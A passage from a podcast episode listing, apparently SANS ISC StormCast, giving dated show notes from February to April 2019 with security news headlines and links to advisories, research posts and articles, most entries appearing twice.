New Waves of Scans Detected By An Old Rule https://isc.sans.edu/forums/diary/New+Waves+of+Scans+Detected+by+an+Old+Rule/24812/ Xiaomi GuardApp Vulnerable to Man in the Middle https://blog.checkpoint.com/2019/04/04/xiaomi-vulnerability-when-security-is-not-what-it-seems/ Xwo Web Scanner Hunting for MongoDB https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner Vulnerable SmartWatches "Defaced" https://api.heise.de/svc/embetty/tweet/1112326532939374593-images-0 https://www.heise.de/newsticker/meldung/Vidimensio-Smartwatches-Der-Sicherheits-Alptraum-geht-weiter-4359967.html
4/4/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, April 4th 2019

Ghidra tips for IDA users: Automatic Comments for API Call Parameters https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+0+automatic+comments+for+API+call+parameters/24806/ Security Awareness Newsletter: Making Passwords Simple https://www.sans.org/security-awareness-training/resources/making-passwords-simple IRS Themed Phishing Emails https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-target-2019-filers Large Leak of Facebook User Data via 3rd Party App https://www.upguard.com/breaches/facebook-user-data-leak Arbitrary Command Execution in PostgreSQL https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
4/4/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Thursday, April 4th 2019

Ghidra tips for IDA users: Automatic Comments for API Call Parameters https://isc.sans.edu/forums/diary/A+few+Ghidra+tips+for+IDA+users+part+0+automatic+comments+for+API+call+parameters/24806/ Security Awareness Newsletter: Making Passwords Simple https://www.sans.org/security-awareness-training/resources/making-passwords-simple IRS Themed Phishing Emails https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-target-2019-filers Large Leak of Facebook User Data via 3rd Party App https://www.upguard.com/breaches/facebook-user-data-leak Arbitrary Command Execution in PostgreSQL https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
4/4/20195 minutes, 47 seconds
Episode Artwork

ISC StormCast for Wednesday, April 3rd 2019

Compromised LaCie Drive Spread Fake AntiVirus https://isc.sans.edu/forums/diary/Fake+AV+is+Back+LaCie+Network+Drives+Used+to+Spread+Malware/24802/ Unpatched SOP Vulnerability in Internet Explorer/Edge https://thehackernews.com/2019/03/microsoft-edge-ie-zero-days.html Apache Fixes Privilege Escalation Flaw https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2019-0211 Verizon Users Phished for Credentials https://blog.lookout.com/mobile-phishing-verizon
4/3/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, April 3rd 2019

Compromised LaCie Drive Spread Fake AntiVirus https://isc.sans.edu/forums/diary/Fake+AV+is+Back+LaCie+Network+Drives+Used+to+Spread+Malware/24802/ Unpatched SOP Vulnerability in Internet Explorer/Edge https://thehackernews.com/2019/03/microsoft-edge-ie-zero-days.html Apache Fixes Privilege Escalation Flaw https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2019-0211 Verizon Users Phished for Credentials https://blog.lookout.com/mobile-phishing-verizon
4/3/20195 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, April 2nd 2019

Common "OpenAction" False Positive in PDFs Created by OpenOffice https://isc.sans.edu/forums/diary/Analysis+of+PDFs+Created+with+OpenOfficeLibreOffice/24798/ Android Monthly Update https://source.android.com/security/bulletin/2019-04-01#2019-04-01-details Malicious Android App Forwards Banking Calls to Attacker https://www.blackhat.com/asia-19/briefings/schedule/index.html#when-voice-phishing-met-malicious-android-app-13419 Google Allowing WebAuthn Login from Firefox/Edge https://twitter.com/christiaanbrand/status/1111430192596025347 All Your Data Are Belong to Us: Defending Against Credential Stuffing Attacks https://www.sans.org/webcasts/data-belong-us-defend-credential-stuffing-110340
4/2/20194 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, April 2nd 2019

Common "OpenAction" False Positive in PDFs Created by OpenOffice https://isc.sans.edu/forums/diary/Analysis+of+PDFs+Created+with+OpenOfficeLibreOffice/24798/ Android Monthly Update https://source.android.com/security/bulletin/2019-04-01#2019-04-01-details Malicious Android App Forwards Banking Calls to Attacker https://www.blackhat.com/asia-19/briefings/schedule/index.html#when-voice-phishing-met-malicious-android-app-13419 Google Allowing WebAuthn Login from Firefox/Edge https://twitter.com/christiaanbrand/status/1111430192596025347 All Your Data Are Belong to Us: Defending Against Credential Stuffing Attacks https://www.sans.org/webcasts/data-belong-us-defend-credential-stuffing-110340
4/2/20194 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, April 1st 2019

Annotating Golang Binaries with Cutter and Jupyter https://isc.sans.edu/forums/diary/Annotating+Golang+binaries+with+Cutter+and+Jupyter/24790/ ASUS Targeted MAC Addresses Available for Download https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/ Weaponized Version of New Zealand Attack Manifesto https://bluehexagon.ai/blog/weaponized-version-of-new-zealand-terror-suspects-manifesto-discovered-in-the-wild/ Kubernetes Directory Traversal https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/ VMWare Patches https://www.vmware.com/security/advisories/VMSA-2019-0005.html
3/31/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, April 1st 2019

Annotating Golang Binaries with Cutter and Jupyter https://isc.sans.edu/forums/diary/Annotating+Golang+binaries+with+Cutter+and+Jupyter/24790/ ASUS Targeted MAC Addresses Available for Download https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/ Weaponized Version of New Zealand Attack Manifesto https://bluehexagon.ai/blog/weaponized-version-of-new-zealand-terror-suspects-manifesto-discovered-in-the-wild/ Kubernetes Directory Traversal https://www.twistlock.com/labs-blog/disclosing-directory-traversal-vulnerability-kubernetes-copy-cve-2019-1002101/ VMWare Patches https://www.vmware.com/security/advisories/VMSA-2019-0005.html
3/31/20195 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, March 29th 2019

Creating Your Own Passive DNS Logs https://isc.sans.edu/forums/diary/Running+your+Own+Passive+DNS+Service/24784/ Incomplete Patch for Cisco RV320 Routers https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-003/-cisco-rv320-unauthenticated-configuration-export https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-004/-cisco-rv320-unauthenticated-diagnostic-data-retrieval TPLink Debug Port Vulnerability https://twitter.com/mjg59/status/1111106885736787975 https://pastebin.com/GAzccR95
3/28/20194 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, March 29th 2019

Creating Your Own Passive DNS Logs https://isc.sans.edu/forums/diary/Running+your+Own+Passive+DNS+Service/24784/ Incomplete Patch for Cisco RV320 Routers https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-003/-cisco-rv320-unauthenticated-configuration-export https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-004/-cisco-rv320-unauthenticated-diagnostic-data-retrieval TPLink Debug Port Vulnerability https://twitter.com/mjg59/status/1111106885736787975 https://pastebin.com/GAzccR95
3/28/20194 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, March 28th 2019

Microsoft Releases Application Guard for Firefox and Chrome https://blogs.windows.com/windowsexperience/2019/03/15/announcing-windows-10-insider-preview-build-18358/ New Set of LTE Vulnerabilities https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf NVidia Privilege Escalation https://rhinosecuritylabs.com/application-security/nvidia-arbitrary-file-writes-to-command-execution-cve-2019-5674/
3/27/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, March 28th 2019

Microsoft Releases Application Guard for Firefox and Chrome https://blogs.windows.com/windowsexperience/2019/03/15/announcing-windows-10-insider-preview-build-18358/ New Set of LTE Vulnerabilities https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf NVidia Privilege Escalation https://rhinosecuritylabs.com/application-security/nvidia-arbitrary-file-writes-to-command-execution-cve-2019-5674/
3/27/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, March 27th 2019

Apple Updates https://support.apple.com/en-us/HT201222 ASUS Response to Kaspersky Report https://www.asus.com/News/hqfgVUyZ6uyAyJe1 Firefox Importing Windows Root Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1533397 UC Webbrowser MITM Vulnerability https://www.bleepingcomputer.com/news/security/uc-browser-for-android-desktop-exposes-500-million-users-to-mitm-attacks/
3/26/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 27th 2019

Apple Updates https://support.apple.com/en-us/HT201222 ASUS Response to Kaspersky Report https://www.asus.com/News/hqfgVUyZ6uyAyJe1 Firefox Importing Windows Root Certificates https://bugzilla.mozilla.org/show_bug.cgi?id=1533397 UC Webbrowser MITM Vulnerability https://www.bleepingcomputer.com/news/security/uc-browser-for-android-desktop-exposes-500-million-users-to-mitm-attacks/
3/26/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, March 26th 2019

ASUS Live Update "ShadowHammer" Backdoor https://www.kaspersky.com/blog/shadow-hammer-teaser https://shadowhammer.kaspersky.com/ Telegram Unsent Feature https://techcrunch.com/2019/03/25/going-going-gone/ F5 Big IP Updates https://support.f5.com/csp/article/K14812883
3/25/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Tuesday, March 26th 2019

ASUS Live Update "ShadowHammer" Backdoor https://www.kaspersky.com/blog/shadow-hammer-teaser https://shadowhammer.kaspersky.com/ Telegram Unsent Feature https://techcrunch.com/2019/03/25/going-going-gone/ F5 Big IP Updates https://support.f5.com/csp/article/K14812883
3/25/20195 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, March 25th 2019

Reversing Malware Written In Golang https://isc.sans.edu/forums/diary/Introduction+to+analysing+Go+binaries/24770/ More "VelvetSweatshop" Maldocs https://isc.sans.edu/forums/diary/VelvetSweatshop+Maldocs/24772/ Reading QR Codes in Python https://isc.sans.edu/forums/diary/Decoding+QR+Codes+with+Python/24774/ Pwn2Own Contest: Firefox, Safari, Edge and others fall https://www.zdnet.com/article/tesla-car-hacked-at-pwn2own-contest/ Norwegian Nokia Phones Sent Data to China (Article in Norwegian) https://nrkbeta.no/2019/03/21/norske-telefoner-sendte-personopplysninger-til-kina/ Java Card Vulnerabilities https://seclists.org/fulldisclosure/2019/Mar/35
3/24/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Monday, March 25th 2019

Reversing Malware Written In Golang https://isc.sans.edu/forums/diary/Introduction+to+analysing+Go+binaries/24770/ More "VelvetSweatshop" Maldocs https://isc.sans.edu/forums/diary/VelvetSweatshop+Maldocs/24772/ Reading QR Codes in Python https://isc.sans.edu/forums/diary/Decoding+QR+Codes+with+Python/24774/ Pwn2Own Contest: Firefox, Safari, Edge and others fall https://www.zdnet.com/article/tesla-car-hacked-at-pwn2own-contest/ Norwegian Nokia Phones Sent Data to China (Article in Norwegian) https://nrkbeta.no/2019/03/21/norske-telefoner-sendte-personopplysninger-til-kina/ Java Card Vulnerabilities https://seclists.org/fulldisclosure/2019/Mar/35
3/24/20196 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, March 21st 2019

Google Photo Cross-Site-Leak Exposes Picture Meta Data https://www.imperva.com/blog/now-patched-google-photos-vulnerability-let-hackers-track-your-friends-and-location-history/ Fake CDC EMails Spread GandCrab Ransomware https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/ Atlassian Sourcetree Vulnerability https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html Microsoft Defender for MacOS https://www.theregister.co.uk/2019/03/21/microsoft_defender_atp/
3/21/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Thursday, March 21st 2019

Google Photo Cross-Site-Leak Exposes Picture Meta Data https://www.imperva.com/blog/now-patched-google-photos-vulnerability-let-hackers-track-your-friends-and-location-history/ Fake CDC EMails Spread GandCrab Ransomware https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/ Atlassian Sourcetree Vulnerability https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2019-03-06-966678691.html Microsoft Defender for MacOS https://www.theregister.co.uk/2019/03/21/microsoft_defender_atp/
3/21/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th 2019

Using Active Directory (AD) To Find Hosts That Are Not in AD https://isc.sans.edu/forums/diary/Using+AD+to+find+hosts+that+arent+in+AD+fun+with+the+IPAddress+construct/24762/ Microsoft Anti Malware Crashing Windows https://social.technet.microsoft.com/Forums/en-US/18ab60a3-3b26-4a07-b68d-84085ce66ce5/scep-crashing-pcs?forum=ConfigMgrCompliance&prof=required Reduction in DDoS Attacks https://www.nexusguard.com/threat-report-q4-2018
3/20/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th 2019

Using Active Directory (AD) To Find Hosts That Are Not in AD https://isc.sans.edu/forums/diary/Using+AD+to+find+hosts+that+arent+in+AD+fun+with+the+IPAddress+construct/24762/ Microsoft Anti Malware Crashing Windows https://social.technet.microsoft.com/Forums/en-US/18ab60a3-3b26-4a07-b68d-84085ce66ce5/scep-crashing-pcs?forum=ConfigMgrCompliance&prof=required Reduction in DDoS Attacks https://www.nexusguard.com/threat-report-q4-2018
3/20/20195 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th 2019

Cloudflare Releases Proxy Detection Tools https://blog.cloudflare.com/monsters-in-the-middleboxes/ Business Email Compromise Moving to SMS https://www.agari.com/email-security-blog/bec-goes-mobile/ JavaScript Requests Without Same Origin Policy Limitations https://www.forcepoint.com/blog/security-labs/attacking-internal-network-public-internet-using-browser-proxy Discovering IPv6 Hosts With UPNP https://blog.talosintelligence.com/2019/03/ipv6-unmasking-via-upnp.html#more
3/19/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th 2019

Cloudflare Releases Proxy Detection Tools https://blog.cloudflare.com/monsters-in-the-middleboxes/ Business Email Compromise Moving to SMS https://www.agari.com/email-security-blog/bec-goes-mobile/ JavaScript Requests Without Same Origin Policy Limitations https://www.forcepoint.com/blog/security-labs/attacking-internal-network-public-internet-using-browser-proxy Discovering IPv6 Hosts With UPNP https://blog.talosintelligence.com/2019/03/ipv6-unmasking-via-upnp.html#more
3/19/20196 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, March 18th 2019

Putty Updates https://www.chiark.greenend.org.uk/~sgtatham/putty/ Fujitsu Wireless Keyboard Vulnerabilities https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-033.txt Signed Malware Goes Undetected https://twitter.com/malwrhunterteam/status/1104082562216062978/photo/1?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1104082562216062978&ref_url=https%3A%2F%2Fwww.theregister.co.uk%2F2019%2F03%2F18%2Fsecurity_roundup_150319%2F Free Support for Ubuntu 14.04 LTS Ends in April https://lists.ubuntu.com/archives/ubuntu-announce/2019-March/000241.html Latest Mirai Version with Even More Exploits https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/
3/18/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, March 18th 2019

Putty Updates https://www.chiark.greenend.org.uk/~sgtatham/putty/ Fujitsu Wireless Keyboard Vulnerabilities https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-033.txt Signed Malware Goes Undetected https://twitter.com/malwrhunterteam/status/1104082562216062978/photo/1?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1104082562216062978&ref_url=https%3A%2F%2Fwww.theregister.co.uk%2F2019%2F03%2F18%2Fsecurity_roundup_150319%2F Free Support for Ubuntu 14.04 LTS Ends in April https://lists.ubuntu.com/archives/ubuntu-announce/2019-March/000241.html Latest Mirai Version with Even More Exploits https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/
3/18/20195 minutes, 41 seconds
Episode Artwork

ISC StormCast for Sunday, March 17th 2019

Binary Analysis With Jupyter and Radare2 https://isc.sans.edu/forums/diary/Binary+Analysis+with+Jupyter+and+Radare2/24748/ IMAP Brute Forcing against Cloud Accounts https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-credential-dumps-phishing-and-legacy-email-protocols Google Allows GSuite Users to Disable SMS/Voice Authentication https://gsuiteupdates.googleblog.com/2019/03/more-control-over-2-step-verification-security-phone-sms.html Sniffing Bitlocker Keys from TPM https://pulsesecurity.co.nz/articles/TPM-sniffing
3/17/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Sunday, March 17th 2019

Binary Analysis With Jupyter and Radare2 https://isc.sans.edu/forums/diary/Binary+Analysis+with+Jupyter+and+Radare2/24748/ IMAP Brute Forcing against Cloud Accounts https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-credential-dumps-phishing-and-legacy-email-protocols Google Allows GSuite Users to Disable SMS/Voice Authentication https://gsuiteupdates.googleblog.com/2019/03/more-control-over-2-step-verification-security-phone-sms.html Sniffing Bitlocker Keys from TPM https://pulsesecurity.co.nz/articles/TPM-sniffing
3/17/20197 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, March 15th 2019

Analyzing ZIP Files in Ghydra https://isc.sans.edu/forums/diary/Tip+Ghidra+ZIP+Files/24732/ 64 Bit Certificate Serial Number Revocation https://adamcaudill.com/2019/03/09/tls-64bit-ish-serial-numbers-mass-revocation/ Cisco Default Account Problem https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190313-cspcscv Intel Patches https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00185.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00191.html
3/15/20195 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, March 15th 2019

Analyzing ZIP Files in Ghydra https://isc.sans.edu/forums/diary/Tip+Ghidra+ZIP+Files/24732/ 64 Bit Certificate Serial Number Revocation https://adamcaudill.com/2019/03/09/tls-64bit-ish-serial-numbers-mass-revocation/ Cisco Default Account Problem https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190313-cspcscv Intel Patches https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00185.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00191.html
3/15/20195 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, March 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2019+Patch+Tuesday/24742/ Adobe Updates https://helpx.adobe.com/security.html PSMiner https://blog.360totalsecurity.com/en/new-mining-worm-psminer-uses-multiple-high-risk-vulnerabilities-to-spread/ Automatic Certificate Managment Environment https://tools.ietf.org/html/rfc8555
3/13/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, March 13th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2019+Patch+Tuesday/24742/ Adobe Updates https://helpx.adobe.com/security.html PSMiner https://blog.360totalsecurity.com/en/new-mining-worm-psminer-uses-multiple-high-risk-vulnerabilities-to-spread/ Automatic Certificate Managment Environment https://tools.ietf.org/html/rfc8555
3/13/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, March 12th 2019

DevOps Tool StackStorm Vulnerability https://quitten.github.io/StackStorm/ Developers Will Not Code Secure By Default https://net.cs.uni-bonn.de/fileadmin/user_upload/naiakshi/Naiakshina_Password_Study.pdf Gaming Industry Supply Chain Attack https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/
3/12/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, March 12th 2019

DevOps Tool StackStorm Vulnerability https://quitten.github.io/StackStorm/ Developers Will Not Code Secure By Default https://net.cs.uni-bonn.de/fileadmin/user_upload/naiakshi/Naiakshina_Password_Study.pdf Gaming Industry Supply Chain Attack https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/
3/12/20195 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, March 11th 2019

Reversing HTA Files https://isc.sans.edu/forums/diary/Quick+and+Dirty+Malicious+HTA+Analysis/24728/ Apache SOLR Patch https://issues.apache.org/jira/browse/SOLR-13301 Windows 7 + Google Chrome Exploit in the Wild https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html Vulnerable Car Alarms https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/
3/10/20196 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, March 11th 2019

Reversing HTA Files https://isc.sans.edu/forums/diary/Quick+and+Dirty+Malicious+HTA+Analysis/24728/ Apache SOLR Patch https://issues.apache.org/jira/browse/SOLR-13301 Windows 7 + Google Chrome Exploit in the Wild https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html Vulnerable Car Alarms https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/
3/10/20196 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, March 8th 2019

RSA Panel Video https://www.rsaconference.com/videos/the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them Disposable E-Mail Addresses https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Disposable+Email+Addresses/24716/ NetApp Default Account Vulnerability https://security.netapp.com/advisory/ntap-20190305-0001/ Cisco NS-OS NX-API Privilege Escalation https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190306-nxos-NXAPI-cmdinj Slub Backdoor Users GitHub and Slack https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/
3/8/20196 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, March 8th 2019

RSA Panel Video https://www.rsaconference.com/videos/the-five-most-dangerous-new-attack-techniques-and-how-to-counter-them Disposable E-Mail Addresses https://isc.sans.edu/forums/diary/Keep+an+Eye+on+Disposable+Email+Addresses/24716/ NetApp Default Account Vulnerability https://security.netapp.com/advisory/ntap-20190305-0001/ Cisco NS-OS NX-API Privilege Escalation https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190306-nxos-NXAPI-cmdinj Slub Backdoor Users GitHub and Slack https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/
3/8/20196 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, March 7th 2019

More Resume Malspam. Now With Trickbot and EternalBlue https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+word+docs+still+pushing+IcedID+Bokbot+with+Trickbot/24708/ Cloudflare Deploys Rules to Protect Against Recent Drupal Exploit https://www.bleepingcomputer.com/news/security/cloudflare-deploys-firewall-rule-to-block-new-drupal-exploits/ Cisco DoS Vulnerability Activity Exploited https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/ MonitorKit uses macOS Game Engine to Analyze Security Events https://github.com/objective-see
3/7/20196 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, March 7th 2019

More Resume Malspam. Now With Trickbot and EternalBlue https://isc.sans.edu/forums/diary/Malspam+with+passwordprotected+word+docs+still+pushing+IcedID+Bokbot+with+Trickbot/24708/ Cloudflare Deploys Rules to Protect Against Recent Drupal Exploit https://www.bleepingcomputer.com/news/security/cloudflare-deploys-firewall-rule-to-block-new-drupal-exploits/ Cisco DoS Vulnerability Activity Exploited https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/ MonitorKit uses macOS Game Engine to Analyze Security Events https://github.com/objective-see
3/7/20196 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, March 6th 2019

Comcast Uses same "0000" PIN For All Number Porting Requests https://nakedsecurity.sophos.com/2019/03/05/comcast-security-nightmare-default-0000-pin-on-everybodys-account/ NSA Releases Ghidra Reverse Analysis Tool https://ghidra-sre.org/ Recent Google Chrome Vulnerability Being Exploited https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html?m=1 Android Monthly Security Bulletin https://source.android.com/security/bulletin/2019-03-01
3/6/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, March 6th 2019

Comcast Uses same "0000" PIN For All Number Porting Requests https://nakedsecurity.sophos.com/2019/03/05/comcast-security-nightmare-default-0000-pin-on-everybodys-account/ NSA Releases Ghidra Reverse Analysis Tool https://ghidra-sre.org/ Recent Google Chrome Vulnerability Being Exploited https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html?m=1 Android Monthly Security Bulletin https://source.android.com/security/bulletin/2019-03-01
3/6/20195 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, March 5th 2019

MacOS Unpatched Privilge Escalation Vulnerability made Public https://bugs.chromium.org/p/project-zero/issues/detail?id=1726 Windows Exploit Suggester Next Generation Released https://github.com/bitsadmin/wesng Docker Vulnerability used for Crypto Miners https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/ Russian GPS Jamming Exercises https://thebarentsobserver.com/en/security/2019/03/russian-military-officials-arrive-oslo-norway-provides-facts-gps-jamming
3/5/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, March 5th 2019

MacOS Unpatched Privilge Escalation Vulnerability made Public https://bugs.chromium.org/p/project-zero/issues/detail?id=1726 Windows Exploit Suggester Next Generation Released https://github.com/bitsadmin/wesng Docker Vulnerability used for Crypto Miners https://www.imperva.com/blog/hundreds-of-vulnerable-docker-hosts-exploited-by-cryptocurrency-miners/ Russian GPS Jamming Exercises https://thebarentsobserver.com/en/security/2019/03/russian-military-officials-arrive-oslo-norway-provides-facts-gps-jamming
3/5/20195 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, March 4th 2019

Cisco Router Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex Coldfusion Patch and Exploit https://www.carehart.org/blog/client/index.cfm/2019/3/1/urgent_CF_security_update_Part_1 Ransomware Impersonates Protonmail https://twitter.com/demonslay335/status/1097866931762282498 eBay Site Used for eBay Phish (article in German) https://www.heise.de/security/meldung/eBay-Phishing-auf-eBay-Seite-4324266.html
3/4/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, March 4th 2019

Cisco Router Patch https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex Coldfusion Patch and Exploit https://www.carehart.org/blog/client/index.cfm/2019/3/1/urgent_CF_security_update_Part_1 Ransomware Impersonates Protonmail https://twitter.com/demonslay335/status/1097866931762282498 eBay Site Used for eBay Phish (article in German) https://www.heise.de/security/meldung/eBay-Phishing-auf-eBay-Seite-4324266.html
3/4/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, March 1st 2019

Emotet Backend Analysis https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/ Kaspersky Vs. Chromecast https://www.bleepingcomputer.com/news/security/kaspersky-av-having-certificate-conflicts-with-google-chromecast/ MageCart Updates https://www.riskiq.com/research/inside-magecart/
3/1/20196 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, March 1st 2019

Emotet Backend Analysis https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/ Kaspersky Vs. Chromecast https://www.bleepingcomputer.com/news/security/kaspersky-av-having-certificate-conflicts-with-google-chromecast/ MageCart Updates https://www.riskiq.com/research/inside-magecart/
3/1/20196 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, February 28th 2019

Coinhive Shutting Down https://coinhive.com/blog/en/discontinuation-of-coinhive Azure Blob Storage Phishing https://www.edgewave.com/phishing/feeling-blue-about-phishing/ Old 2014 Elastic Search Vulnerability Exploited https://blog.talosintelligence.com/2019/02/cisco-talos-honeypot-analysis-reveals.html Latest Drupal Vulnerability Exploited https://www.imperva.com/blog/latest-drupal-rce-flaw-used-by-cryptocurrency-miners-and-other-attackers/ F5 Big IP Patches https://support.f5.com/csp/article/K91026261
2/28/20195 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, February 28th 2019

Coinhive Shutting Down https://coinhive.com/blog/en/discontinuation-of-coinhive Azure Blob Storage Phishing https://www.edgewave.com/phishing/feeling-blue-about-phishing/ Old 2014 Elastic Search Vulnerability Exploited https://blog.talosintelligence.com/2019/02/cisco-talos-honeypot-analysis-reveals.html Latest Drupal Vulnerability Exploited https://www.imperva.com/blog/latest-drupal-rce-flaw-used-by-cryptocurrency-miners-and-other-attackers/ F5 Big IP Patches https://support.f5.com/csp/article/K91026261
2/28/20195 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, February 27th 2019

Thunderbolt "Thunderclap" Vulnerabilities https://thunderclap.io/thunderclap-paper-ndss2019.pdf Altering Signed PDF Documents https://www.pdf-insecurity.org/ NVidia Patches https://nvidia.custhelp.com/app/answers/detail/a_id/4772
2/27/20195 minutes
Episode Artwork

ISC StormCast for Wednesday, February 27th 2019

Thunderbolt "Thunderclap" Vulnerabilities https://thunderclap.io/thunderclap-paper-ndss2019.pdf Altering Signed PDF Documents https://www.pdf-insecurity.org/ NVidia Patches https://nvidia.custhelp.com/app/answers/detail/a_id/4772
2/27/20195 minutes
Episode Artwork

ISC StormCast for Tuesday, February 26th 2019

